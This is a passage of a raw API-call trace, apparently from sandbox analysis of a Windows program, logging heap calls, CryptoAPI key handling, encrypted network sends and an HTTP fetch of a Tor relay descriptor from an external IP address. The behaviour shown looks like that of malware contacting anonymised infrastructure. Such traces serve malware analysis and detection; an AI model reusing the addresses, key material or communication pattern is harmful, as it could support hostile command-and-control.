(_Block=0x3f4c0b8) [0143.205] free (_Block=0x3648e30) [0143.205] free (_Block=0x3e223e0) [0143.205] memchr (_Buf=0x36927a8, _Val=32, _MaxCount=0x40) returned 0x0 [0143.205] malloc (_Size=0x41) returned 0x3692708 [0143.205] free (_Block=0x0) [0143.205] malloc (_Size=0x40) returned 0x3e226f8 [0143.205] free (_Block=0x0) [0143.205] free (_Block=0x0) [0143.205] free (_Block=0x3692708) [0143.205] free (_Block=0x3e226f8) [0143.205] memchr (_Buf=0x36925c8, _Val=32, _MaxCount=0x40) returned 0x0 [0143.205] malloc (_Size=0x41) returned 0x36924d8 [0143.205] free (_Block=0x0) [0143.205] malloc (_Size=0x40) returned 0x3e22350 [0143.205] free (_Block=0x0) [0143.205] free (_Block=0x0) [0143.205] free (_Block=0x36924d8) [0143.205] free (_Block=0x3e22350) [0143.205] memchr (_Buf=0x3e220c8, _Val=32, _MaxCount=0x3c) returned 0x0 [0143.205] malloc (_Size=0x3d) returned 0x3e22278 [0143.205] free (_Block=0x0) [0143.205] malloc (_Size=0x40) returned 0x3e224b8 [0143.205] free (_Block=0x0) [0143.205] free (_Block=0x0) [0143.206] free (_Block=0x3e22278) [0143.206] free (_Block=0x3e224b8) [0143.206] memchr (_Buf=0x3d80198, _Val=32, _MaxCount=0x1c) returned 0x3d801a0 [0143.206] malloc (_Size=0x9) returned 0x3648d40 [0143.206] free (_Block=0x0) [0143.206] malloc (_Size=0x40) returned 0x3e22110 [0143.206] free (_Block=0x0) [0143.206] free (_Block=0x0) [0143.206] memchr (_Buf=0x3d801a1, _Val=32, _MaxCount=0x13) returned 0x3d801a4 [0143.206] malloc (_Size=0x4) returned 0x3f4bf48 [0143.206] free (_Block=0x0) [0143.206] free (_Block=0x0) [0143.206] memchr (_Buf=0x3d801a5, _Val=32, _MaxCount=0xf) returned 0x3d801ab [0143.206] malloc (_Size=0x7) returned 0x3f4c0e8 [0143.206] free (_Block=0x0) [0143.206] free (_Block=0x0) [0143.206] memchr (_Buf=0x3d801ac, _Val=32, _MaxCount=0x8) returned 0x0 [0143.206] malloc (_Size=0x9) returned 0x3648d88 [0143.206] free (_Block=0x0) [0143.206] free (_Block=0x0) [0143.206] CryptStringToBinaryA (in: pszString="MIGJAoGBAM15H7DaMR+TgyaE4SFgxMde0znxicOgMeW5kPAe8P7SwmGEvGQkiwjHJ54+gAqygkQpC5DMcHHiVucTSYvjcnxtP8gXNsR5j3f50GBOY/7EvPLvamyhvK2lnEGLJZuGQIQFP3EsX0H0/K2SpwchmacqmS8STH/gQEQSf5WN68DFAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339f9c0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339f9c0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0143.206] malloc (_Size=0x8c) returned 0x6066d8 [0143.206] free (_Block=0x0) [0143.206] CryptStringToBinaryA (in: pszString="MIGJAoGBAM15H7DaMR+TgyaE4SFgxMde0znxicOgMeW5kPAe8P7SwmGEvGQkiwjHJ54+gAqygkQpC5DMcHHiVucTSYvjcnxtP8gXNsR5j3f50GBOY/7EvPLvamyhvK2lnEGLJZuGQIQFP3EsX0H0/K2SpwchmacqmS8STH/gQEQSf5WN68DFAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x6066d8, pcbBinary=0x339f9c0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x6066d8, pcbBinary=0x339f9c0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0143.206] malloc (_Size=0x8c) returned 0x3f6af38 [0143.206] free (_Block=0x0) [0143.206] free (_Block=0x0) [0143.207] free (_Block=0x6066d8) [0143.207] free (_Block=0x3648d40) [0143.207] free (_Block=0x3f4bf48) [0143.207] free (_Block=0x3f4c0e8) [0143.207] free (_Block=0x3648d88) [0143.207] free (_Block=0x3e22110) [0143.207] free (_Block=0x3594d18) [0143.207] free (_Block=0x36247b0) [0143.207] free (_Block=0x3f654c0) [0143.207] free (_Block=0x3648ce0) [0143.207] free (_Block=0x3648d28) [0143.207] free (_Block=0x3d80300) [0143.207] free (_Block=0x60e8c8) [0143.207] free (_Block=0x60ec38) [0143.207] free (_Block=0x3e222c0) [0143.207] free (_Block=0x3d80328) [0143.207] free (_Block=0x3648ec0) [0143.207] free (_Block=0x3d801e8) [0143.207] free (_Block=0x60ed28) [0143.207] free (_Block=0x60ee18) [0143.207] free (_Block=0x3e22620) [0143.207] free (_Block=0x3d80120) [0143.207] free (_Block=0x3624530) [0143.207] free (_Block=0x3d800a8) [0143.207] free (_Block=0x3648e00) [0143.207] free (_Block=0x3648e18) [0143.207] free (_Block=0x3d801c0) [0143.207] free (_Block=0x60ee68) [0143.207] free (_Block=0x60e6e8) [0143.207] free (_Block=0x3e22470) [0143.207] free (_Block=0x3d803a0) [0143.207] free (_Block=0x3648cf8) [0143.207] free (_Block=0x3d80210) [0143.208] free (_Block=0x60e738) [0143.208] free (_Block=0x60e788) [0143.208] free (_Block=0x3e22080) [0143.208] free (_Block=0x3d80080) [0143.208] free (_Block=0x36246f0) [0143.208] free (_Block=0x3d80238) [0143.208] free (_Block=0x3648de8) [0143.208] free (_Block=0x3648e90) [0143.208] free (_Block=0x3d800d0) [0143.208] free (_Block=0x3692938) [0143.208] free (_Block=0x36927f8) [0143.208] free (_Block=0x3e22038) [0143.208] free (_Block=0x3d80148) [0143.208] free (_Block=0x3648d10) [0143.208] free (_Block=0x3d80350) [0143.208] free (_Block=0x36927a8) [0143.208] free (_Block=0x36925c8) [0143.208] free (_Block=0x3e220c8) [0143.208] free (_Block=0x3d80198) [0143.208] free (_Block=0x3f69ce0) [0143.208] free (_Block=0x0) [0143.208] free (_Block=0x60d508) [0143.208] free (_Block=0x60cdc0) [0143.209] free (_Block=0x3f6a410) [0143.210] free (_Block=0x3e22398) [0143.210] free (_Block=0x3648f08) [0143.210] free (_Block=0x3648cb0) [0143.210] free (_Block=0x3d803f0) [0143.210] free (_Block=0x3defc20) [0143.210] free (_Block=0x3defd60) [0143.210] free (_Block=0x3e22548) [0143.210] free (_Block=0x3d802d8) [0143.210] free (_Block=0x36249c0) [0143.210] free (_Block=0x60de88) [0143.210] free (_Block=0x3f65460) [0143.210] free (_Block=0x3f65280) [0143.210] free (_Block=0x3f65380) [0143.210] free (_Block=0x3deffe0) [0143.210] free (_Block=0x3defd10) [0143.210] free (_Block=0x3defdb0) [0143.210] free (_Block=0x3defe00) [0143.210] free (_Block=0x3defa40) [0143.210] free (_Block=0x3defe50) [0143.210] free (_Block=0x3defae0) [0143.210] free (_Block=0x3deff90) [0143.210] free (_Block=0x3defea0) [0143.210] free (_Block=0x3defa90) [0143.210] free (_Block=0x3def9a0) [0143.210] free (_Block=0x3defef0) [0143.210] free (_Block=0x3deff40) [0143.210] free (_Block=0x3defcc0) [0143.210] free (_Block=0x3defb80) [0143.210] free (_Block=0x3def900) [0143.210] free (_Block=0x3df0030) [0143.210] free (_Block=0x3defc70) [0143.210] free (_Block=0x3defb30) [0143.210] free (_Block=0x3df0080) [0143.211] free (_Block=0x3def950) [0143.211] free (_Block=0x3defbd0) [0143.211] free (_Block=0x3def9f0) [0143.211] free (_Block=0x60eb98) [0143.211] free (_Block=0x60e968) [0143.211] free (_Block=0x60e878) [0143.211] free (_Block=0x60e918) [0143.211] free (_Block=0x60e9b8) [0143.211] free (_Block=0x60e7d8) [0143.211] free (_Block=0x60eaa8) [0143.211] free (_Block=0x60eaf8) [0143.211] free (_Block=0x60edc8) [0143.211] free (_Block=0x60ea58) [0143.211] free (_Block=0x60ea08) [0143.211] free (_Block=0x60e828) [0143.211] free (_Block=0x60ec88) [0143.211] free (_Block=0x60eb48) [0143.211] free (_Block=0x60ed78) [0143.211] free (_Block=0x3624950) [0143.211] free (_Block=0x3f652c0) [0143.211] free (_Block=0x3648cc8) [0143.211] free (_Block=0x3d803c8) [0143.211] free (_Block=0x60ebe8) [0143.211] free (_Block=0x60ecd8) [0143.211] free (_Block=0x3624838) [0143.211] free (_Block=0x3f65340) [0143.211] free (_Block=0x3def350) [0143.211] free (_Block=0x0) [0143.211] free (_Block=0x3f68010) [0143.211] free (_Block=0x36242f0) [0143.211] CloseHandle (hObject=0x5d4) returned 1 [0143.212] CloseHandle (hObject=0x5d0) returned 1 [0143.212] free (_Block=0x0) [0143.212] free (_Block=0x3d66630) [0143.212] malloc (_Size=0x202) returned 0x3df0420 [0143.212] free (_Block=0x0) [0143.212] EncryptMessage (in: phContext=0x3d81944, fQOP=0x0, pMessage=0x339fa2c, MessageSeqNo=0x0 | out: pMessage=0x339fa2c) returned 0x0 [0143.212] send (s=0x5b0, buf=0x3689268*, len=543, flags=0) returned 543 [0143.212] free (_Block=0x3df0420) [0143.213] free (_Block=0x0) [0143.213] CryptDestroyKey (hKey=0x432e78) returned 1 [0143.214] free (_Block=0x3df00e0) [0143.214] CryptDestroyHash (hHash=0x4329f8) returned 1 [0143.214] CryptDestroyHash (hHash=0x432bf8) returned 1 [0143.214] CryptDestroyKey (hKey=0x4327b8) returned 1 [0143.214] CryptDestroyKey (hKey=0x432cb8) returned 1 [0143.214] free (_Block=0x605a18) [0143.214] free (_Block=0x3624770) [0143.214] CryptDestroyKey (hKey=0x432d38) returned 1 [0143.215] free (_Block=0x3def010) [0143.215] CryptDestroyHash (hHash=0x432eb8) returned 1 [0143.215] CryptDestroyHash (hHash=0x432d78) returned 1 [0143.215] CryptDestroyKey (hKey=0x432738) returned 1 [0143.215] CryptDestroyKey (hKey=0x432978) returned 1 [0143.215] free (_Block=0x3d81e60) [0143.215] free (_Block=0x3624230) [0143.215] SetEvent (hEvent=0x5c8) returned 1 [0143.215] SetEvent (hEvent=0x5cc) returned 1 [0143.215] free (_Block=0x3648e60) [0143.215] free (_Block=0x3d802b0) [0143.215] CloseHandle (hObject=0x5cc) returned 1 [0143.215] CloseHandle (hObject=0x5c8) returned 1 [0143.215] free (_Block=0x3d9ab98) [0143.215] malloc (_Size=0x50) returned 0x3d9ae00 [0143.215] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5c8 [0143.215] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5cc [0143.215] SetEvent (hEvent=0x5c8) returned 1 [0143.215] malloc (_Size=0x34) returned 0x36244b0 [0143.215] malloc (_Size=0x338) returned 0x3df00e0 [0143.215] malloc (_Size=0x80) returned 0x60a248 [0143.216] free (_Block=0x0) [0143.216] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x80, pbBuffer=0x60a248 | out: pbBuffer=0x60a248) returned 1 [0143.216] CryptImportKey (in: hProv=0x3e57b0, pbData=0x339f788, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x339f784 | out: phKey=0x339f784*=0x432bf8) returned 1 [0143.219] CryptExportKey (in: hKey=0x432bf8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f3e4, pdwDataLen=0x339f3cc | out: pbData=0x339f3e4*, pdwDataLen=0x339f3cc*=0x90) returned 1 [0143.219] free (_Block=0x60a248) [0143.219] malloc (_Size=0x10) returned 0x3648e00 [0143.219] free (_Block=0x0) [0143.219] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x10, pbBuffer=0x3648e00 | out: pbBuffer=0x3648e00) returned 1 [0143.219] malloc (_Size=0x40) returned 0x3e22740 [0143.219] free (_Block=0x0) [0143.219] malloc (_Size=0x104) returned 0x3df0420 [0143.219] free (_Block=0x3e22740) [0143.219] CryptDecodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x13, pbEncoded=0x606770, cbEncoded=0x8c, dwFlags=0x0, pvStructInfo=0x339f984, pcbStructInfo=0x339f95c | out: pvStructInfo=0x339f984, pcbStructInfo=0x339f95c) returned 1 [0143.219] CryptImportKey (in: hProv=0x3cf450, pbData=0x339f984, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x1, phKey=0x339f980 | out: phKey=0x339f980*=0x432978) returned 1 [0143.219] malloc (_Size=0x80) returned 0x60a468 [0143.220] free (_Block=0x0) [0143.220] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=1, dwFlags=0x40, pbData=0x60a468*, pdwDataLen=0x339f950*=0x56, dwBufLen=0x80 | out: pbData=0x60a468*, pdwDataLen=0x339f950*=0x80) returned 1 [0143.220] CryptDestroyKey (hKey=0x432978) returned 1 [0143.220] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa20, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa1c | out: phKey=0x339fa1c*=0x432d78) returned 1 [0143.220] CryptSetKeyParam (hKey=0x432d78, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0143.220] malloc (_Size=0x3a) returned 0x3e22308 [0143.220] free (_Block=0x0) [0143.220] CryptEncrypt (in: hKey=0x432d78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0143.220] CryptEncrypt (in: hKey=0x432d78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0143.220] CryptEncrypt (in: hKey=0x432d78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0143.220] CryptEncrypt (in: hKey=0x432d78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0143.220] CryptDestroyKey (hKey=0x432d78) returned 1 [0143.220] malloc (_Size=0x100) returned 0x3df0530 [0143.220] free (_Block=0x0) [0143.220] free (_Block=0x0) [0143.220] free (_Block=0x3e22308) [0143.220] free (_Block=0x60a468) [0143.220] free (_Block=0x3df0420) [0143.220] free (_Block=0x3648e00) [0143.220] malloc (_Size=0xba) returned 0x3594d18 [0143.220] free (_Block=0x0) [0143.220] malloc (_Size=0x202) returned 0x3d81e60 [0143.221] free (_Block=0x0) [0143.221] EncryptMessage (in: phContext=0x3d81944, fQOP=0x0, pMessage=0x339fa6c, MessageSeqNo=0x0 | out: pMessage=0x339fa6c) returned 0x0 [0143.221] send (s=0x5b0, buf=0x3689268*, len=543, flags=0) returned 543 [0143.221] free (_Block=0x3d81e60) [0143.221] free (_Block=0x3594d18) [0143.221] free (_Block=0x3df0530) [0143.221] GetTickCount () returned 0x1164b49 [0143.221] malloc (_Size=0x10) returned 0x3648cc8 [0143.221] free (_Block=0x0) [0143.221] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648cc8*=0x5c8, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0143.221] free (_Block=0x3648cc8) [0143.221] GetTickCount () returned 0x1164b49 [0143.221] malloc (_Size=0x10) returned 0x3648d88 [0143.221] free (_Block=0x0) [0143.221] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648d88*=0x5c8, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0143.672] free (_Block=0x3648d88) [0143.672] GetTickCount () returned 0x1164d0e [0143.672] SetEvent (hEvent=0x5c8) returned 1 [0143.672] malloc (_Size=0x34) returned 0x3624470 [0143.673] malloc (_Size=0x338) returned 0x3691270 [0143.673] malloc (_Size=0x80) returned 0x6098b8 [0143.673] free (_Block=0x0) [0143.673] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x80, pbBuffer=0x6098b8 | out: pbBuffer=0x6098b8) returned 1 [0143.673] CryptImportKey (in: hProv=0x3e57b0, pbData=0x339f798, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x339f794 | out: phKey=0x339f794*=0x432e78) returned 1 [0143.676] CryptExportKey (in: hKey=0x432e78, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f3f4, pdwDataLen=0x339f3dc | out: pbData=0x339f3f4*, pdwDataLen=0x339f3dc*=0x90) returned 1 [0143.676] free (_Block=0x6098b8) [0143.676] CryptBinaryToStringA (in: pbBinary=0x3e2b028, cbBinary=0x14, dwFlags=0x4000000c, pszString=0x0, pcchString=0x339fa9c | out: pszString=0x0, pcchString=0x339fa9c) returned 1 [0143.676] malloc (_Size=0x29) returned 0x36249c0 [0143.676] free (_Block=0x0) [0143.676] CryptBinaryToStringA (in: pbBinary=0x3e2b028, cbBinary=0x14, dwFlags=0x4000000c, pszString=0x36249c0, pcchString=0x339fa9c | out: pszString="7ca53c34d8c70376a1638ee7a934a7cb03996be2", pcchString=0x339fa9c) returned 1 [0143.676] malloc (_Size=0x10) returned 0x3648c50 [0143.677] free (_Block=0x0) [0143.677] malloc (_Size=0x10) returned 0x3648db8 [0143.677] free (_Block=0x0) [0143.677] malloc (_Size=0x38) returned 0x3624430 [0143.677] free (_Block=0x3648db8) [0143.677] malloc (_Size=0x8) returned 0x3f4c0d8 [0143.677] free (_Block=0x0) [0143.677] malloc (_Size=0x10) returned 0x3648db8 [0143.677] free (_Block=0x0) [0143.677] malloc (_Size=0x50) returned 0x3d9ac48 [0143.677] free (_Block=0x3648db8) [0143.677] malloc (_Size=0x150) returned 0x3d806a8 [0143.677] free (_Block=0x3d9ac48) [0143.677] malloc (_Size=0x550) returned 0x3def010 [0143.677] free (_Block=0x3d806a8) [0143.677] malloc (_Size=0x1550) returned 0x36929c0 [0143.678] free (_Block=0x3def010) [0143.678] malloc (_Size=0x5550) returned 0x348c1b8 [0143.678] free (_Block=0x36929c0) [0143.678] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x4, pbBuffer=0x339f9c4 | out: pbBuffer=0x339f9c4) returned 1 [0143.678] free (_Block=0x348c1b8) [0143.678] free (_Block=0x0) [0143.678] free (_Block=0x0) [0143.678] free (_Block=0x3f4c0d8) [0143.678] inet_ntoa (in=0xd97fb9cd) returned="205.185.127.217" [0143.678] malloc (_Size=0x10) returned 0x3648e78 [0143.678] free (_Block=0x0) [0143.678] gethostbyname (name="205.185.127.217") returned 0x42b838*(h_name="205.185.127.217", h_aliases=0x42b848*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x42b84c*=([0]="205.185.127.217")) [0143.679] htons (hostshort=0x50) returned 0x5000 [0143.679] socket (af=2, type=1, protocol=6) returned 0x5d0 [0143.680] connect (s=0x5d0, name=0x339f9a0*(sa_family=2, sin_port=0x50, sin_addr="205.185.127.217"), namelen=16) returned 0 [0143.848] _vscprintf (_Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x339f968) returned 95 [0143.848] malloc (_Size=0x60) returned 0x60e150 [0143.848] free (_Block=0x0) [0143.848] vsprintf_s (in: _DstBuf=0x60e150, _SizeInBytes=0x60, _Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x339f968 | out: _DstBuf="GET /tor/server/fp/7ca53c34d8c70376a1638ee7a934a7cb03996be2 HTTP/1.0\r\nHost: 205.185.127.217\r\n\r\n") returned 95 [0143.848] send (s=0x5d0, buf=0x60e150*, len=96, flags=0) returned 96 [0143.849] recv (in: s=0x5d0, buf=0x339e964, len=4096, flags=0 | out: buf=0x339e964*) returned 2000 [0144.020] malloc (_Size=0x7d1) returned 0x3def010 [0144.021] free (_Block=0x0) [0144.021] recv (in: s=0x5d0, buf=0x339e964, len=4096, flags=0 | out: buf=0x339e964*) returned 482 [0144.022] malloc (_Size=0xbb9) returned 0x3f68010 [0144.022] free (_Block=0x3def010) [0144.022] recv (in: s=0x5d0, buf=0x339e964, len=4096, flags=0 | out: buf=0x339e964) returned 0 [0144.022] closesocket (s=0x5d0) returned 0 [0144.023] malloc (_Size=0x8fc) returned 0x60cdc0 [0144.023] free (_Block=0x0) [0144.023] free (_Block=0x3f68010) [0144.023] free (_Block=0x60e150) [0144.023] closesocket (s=0xffffffff) returned -1 [0144.023] free (_Block=0x0) [0144.023] free (_Block=0x3648e78) [0144.023] free (_Block=0x0) [0144.023] free (_Block=0x3624430) [0144.023] free (_Block=0x3648c50) [0144.023] free (_Block=0x36249c0) [0144.023] malloc (_Size=0x8fc) returned 0x3f68010 [0144.023] free (_Block=0x0) [0144.023] malloc (_Size=0x29) returned 0x3624ad8 [0144.023] free (_Block=0x0) [0144.023] malloc (_Size=0x40) returned 0x3e22668 [0144.023] free (_Block=0x0) [0144.023] free (_Block=0x0) [0144.024] memchr (_Buf=0x3f68039, _Val=10, _MaxCount=0x8d2) returned 0x3f68049 [0144.024] malloc (_Size=0x11) returned 0x3f652c0 [0144.024] free (_Block=0x0) [0144.024] free (_Block=0x0) [0144.024] memchr (_Buf=0x3f6804a, _Val=10, _MaxCount=0x8c1) returned 0x3f68066 [0144.024] malloc (_Size=0x1d) returned 0x3d803a0 [0144.024] free (_Block=0x0) [0144.024] free (_Block=0x0) [0144.024] memchr (_Buf=0x3f68067, _Val=10, _MaxCount=0x8a4) returned 0x3f680a7 [0144.024] malloc (_Size=0x41) returned 0x60eb98 [0144.024] free (_Block=0x0) [0144.024] free (_Block=0x0) [0144.024] memchr (_Buf=0x3f680a8, _Val=10, _MaxCount=0x863) returned 0x3f680e8 [0144.024] malloc (_Size=0x41) returned 0x60ecd8 [0144.024] free (_Block=0x0) [0144.024] malloc (_Size=0x140) returned 0x3dd3d50 [0144.024] free (_Block=0x3e22668) [0144.024] free (_Block=0x0) [0144.024] memchr (_Buf=0x3f680e9, _Val=10, _MaxCount=0x822) returned 0x3f68125 [0144.024] malloc (_Size=0x3d) returned 0x3e22548 [0144.025] free (_Block=0x0) [0144.025] free (_Block=0x0) [0144.025] memchr (_Buf=0x3f68126, _Val=10, _MaxCount=0x7e5) returned 0x3f68140 [0144.025] malloc (_Size=0x1b) returned 0x3d800a8 [0144.025] free (_Block=0x0) [0144.025] free (_Block=0x0) [0144.025] memchr (_Buf=0x3f68141, _Val=10, _MaxCount=0x7ca) returned 0x3f6817f [0144.025] malloc (_Size=0x3f) returned 0x3e22470 [0144.025] free (_Block=0x0) [0144.025] free (_Block=0x0) [0144.025] memchr (_Buf=0x3f68180, _Val=10, _MaxCount=0x78b) returned 0x3f681a6 [0144.025] malloc (_Size=0x27) returned 0x60ddc8 [0144.025] free (_Block=0x0) [0144.025] free (_Block=0x0) [0144.025] memchr (_Buf=0x3f681a7, _Val=10, _MaxCount=0x764) returned 0x3f681c5 [0144.025] malloc (_Size=0x1f) returned 0x3d801c0 [0144.025] free (_Block=0x0) [0144.025] free (_Block=0x0) [0144.025] memchr (_Buf=0x3f681c6, _Val=10, _MaxCount=0x745) returned 0x3f68239 [0144.025] malloc (_Size=0x74) returned 0x3d66e30 [0144.025] free (_Block=0x0) [0144.026] free (_Block=0x0) [0144.026] memchr (_Buf=0x3f6823a, _Val=10, _MaxCount=0x6d1) returned 0x3f68257 [0144.026] malloc (_Size=0x1e) returned 0x3d80238 [0144.026] free (_Block=0x0) [0144.026] free (_Block=0x0) [0144.026] memchr (_Buf=0x3f68258, _Val=10, _MaxCount=0x6b3) returned 0x3f68295 [0144.026] malloc (_Size=0x3e) returned 0x3e224b8 [0144.026] free (_Block=0x0) [0144.026] free (_Block=0x0) [0144.026] memchr (_Buf=0x3f68296, _Val=10, _MaxCount=0x675) returned 0x3f682a5 [0144.026] malloc (_Size=0x10) returned 0x3648ec0 [0144.026] free (_Block=0x0) [0144.026] free (_Block=0x0) [0144.026] memchr (_Buf=0x3f682a6, _Val=10, _MaxCount=0x665) returned 0x3f682cd [0144.026] malloc (_Size=0x28) returned 0x60dd08 [0144.026] free (_Block=0x0) [0144.026] free (_Block=0x0) [0144.026] memchr (_Buf=0x3f682ce, _Val=10, _MaxCount=0x63d) returned 0x3f68334 [0144.026] malloc (_Size=0x67) returned 0x60b150 [0144.026] free (_Block=0x0) [0144.027] free (_Block=0x0) [0144.027] memchr (_Buf=0x3f68335, _Val=10, _MaxCount=0x5d6) returned 0x3f6833e [0144.027] malloc (_Size=0xa) returned 0x3648cc8 [0144.027] free (_Block=0x0) [0144.027] free (_Block=0x0) [0144.027] memchr (_Buf=0x3f6833f, _Val=10, _MaxCount=0x5cc) returned 0x3f6835d [0144.027] malloc (_Size=0x1f) returned 0x3d80120 [0144.027] free (_Block=0x0) [0144.027] free (_Block=0x0) [0144.027] memchr (_Buf=0x3f6835e, _Val=10, _MaxCount=0x5ad) returned 0x3f6839e [0144.027] malloc (_Size=0x41) returned 0x60e738 [0144.027] free (_Block=0x0) [0144.027] free (_Block=0x0) [0144.027] memchr (_Buf=0x3f6839f, _Val=10, _MaxCount=0x56c) returned 0x3f683df [0144.027] malloc (_Size=0x41) returned 0x60ee68 [0144.027] free (_Block=0x0) [0144.027] free (_Block=0x0) [0144.027] memchr (_Buf=0x3f683e0, _Val=10, _MaxCount=0x52b) returned 0x3f6841c [0144.027] malloc (_Size=0x3d) returned 0x3e22740 [0144.027] free (_Block=0x0) [0144.027] malloc (_Size=0x540) returned 0x60d6c8 [0144.028] free (_Block=0x3dd3d50) [0144.028] free (_Block=0x0) [0144.028] memchr (_Buf=0x3f6841d, _Val=10, _MaxCount=0x4ee) returned 0x3f68439 [0144.028] malloc (_Size=0x1d) returned 0x3d801e8 [0144.028] free (_Block=0x0) [0144.028] free (_Block=0x0) [0144.028] memchr (_Buf=0x3f6843a, _Val=10, _MaxCount=0x4d1) returned 0x3f68445 [0144.028] malloc (_Size=0xc) returned 0x3648c98 [0144.028] free (_Block=0x0) [0144.028] free (_Block=0x0) [0144.028] memchr (_Buf=0x3f68446, _Val=10, _MaxCount=0x4c5) returned 0x3f68464 [0144.028] malloc (_Size=0x1f) returned 0x3d80350 [0144.028] free (_Block=0x0) [0144.028] free (_Block=0x0) [0144.028] memchr (_Buf=0x3f68465, _Val=10, _MaxCount=0x4a6) returned 0x3f684a5 [0144.028] malloc (_Size=0x41) returned 0x60ea58 [0144.028] free (_Block=0x0) [0144.028] free (_Block=0x0) [0144.028] memchr (_Buf=0x3f684a6, _Val=10, _MaxCount=0x465) returned 0x3f684e6 [0144.028] malloc (_Size=0x41) returned 0x60ed28 [0144.028] free (_Block=0x0) [0144.029] free (_Block=0x0) [0144.029] memchr (_Buf=0x3f684e7, _Val=10, _MaxCount=0x424) returned 0x3f68523 [0144.029] malloc (_Size=0x3d) returned 0x3e221e8 [0144.029] free (_Block=0x0) [0144.029] free (_Block=0x0) [0144.029] memchr (_Buf=0x3f68524, _Val=10, _MaxCount=0x3e7) returned 0x3f68540 [0144.029] malloc (_Size=0x1d) returned 0x3d80080 [0144.029] free (_Block=0x0) [0144.029] free (_Block=0x0) [0144.029] memchr (_Buf=0x3f68541, _Val=10, _MaxCount=0x3ca) returned 0x3f68554 [0144.029] malloc (_Size=0x14) returned 0x3f65460 [0144.029] free (_Block=0x0) [0144.029] free (_Block=0x0) [0144.029] memchr (_Buf=0x3f68555, _Val=10, _MaxCount=0x3b6) returned 0x3f6856e [0144.029] malloc (_Size=0x1a) returned 0x3d800d0 [0144.029] free (_Block=0x0) [0144.029] free (_Block=0x0) [0144.029] memchr (_Buf=0x3f6856f, _Val=10, _MaxCount=0x39c) returned 0x3f685af [0144.029] malloc (_Size=0x41) returned 0x60e6e8 [0144.030] free (_Block=0x0) [0144.030] free (_Block=0x0) [0144.030] memchr (_Buf=0x3f685b0, _Val=10, _MaxCount=0x35b) returned 0x3f685f0 [0144.030] malloc (_Size=0x41) returned 0x60e878 [0144.030] free (_Block=0x0) [0144.030] free (_Block=0x0) [0144.030] memchr (_Buf=0x3f685f1, _Val=10, _MaxCount=0x31a) returned 0x3f6861d [0144.030] malloc (_Size=0x2d) returned 0x3624988 [0144.030] free (_Block=0x0) [0144.030] free (_Block=0x0) [0144.030] memchr (_Buf=0x3f6861e, _Val=10, _MaxCount=0x2ed) returned 0x3f68635 [0144.030] malloc (_Size=0x18) returned 0x3f653e0 [0144.030] free (_Block=0x0) [0144.030] free (_Block=0x0) [0144.030] memchr (_Buf=0x3f68636, _Val=10, _MaxCount=0x2d5) returned 0x3f68650 [0144.030] malloc (_Size=0x1b) returned 0x3d802b0 [0144.030] free (_Block=0x0) [0144.030] free (_Block=0x0) [0144.030] memchr (_Buf=0x3f68651, _Val=10, _MaxCount=0x2ba) returned 0x3f6866d [0144.030] malloc (_Size=0x1d) returned 0x3d80148 [0144.030] free (_Block=0x0) [0144.031] free (_Block=0x0) [0144.031] memchr (_Buf=0x3f6866e, _Val=10, _MaxCount=0x29d) returned 0x3f686ae [0144.031] malloc (_Size=0x41) returned 0x60ebe8 [0144.031] free (_Block=0x0) [0144.031] free (_Block=0x0) [0144.031] memchr (_Buf=0x3f686af, _Val=10, _MaxCount=0x25c) returned 0x3f686ef [0144.031] malloc (_Size=0x41) returned 0x60e788 [0144.031] free (_Block=0x0) [0144.031] free (_Block=0x0) [0144.031] memchr (_Buf=0x3f686f0, _Val=10, _MaxCount=0x21b) returned 0x3f686fc [0144.031] malloc (_Size=0xd) returned 0x3648d88 [0144.031] free (_Block=0x0) [0144.031] free (_Block=0x0) [0144.031] memchr (_Buf=0x3f686fd, _Val=10, _MaxCount=0x20e) returned 0x3f68717 [0144.031] malloc (_Size=0x1b) returned 0x3d803c8 [0144.031] free (_Block=0x0) [0144.031] free (_Block=0x0) [0144.031] memchr (_Buf=0x3f68718, _Val=10, _MaxCount=0x1f3) returned 0x3f6872a [0144.031] malloc (_Size=0x13) returned 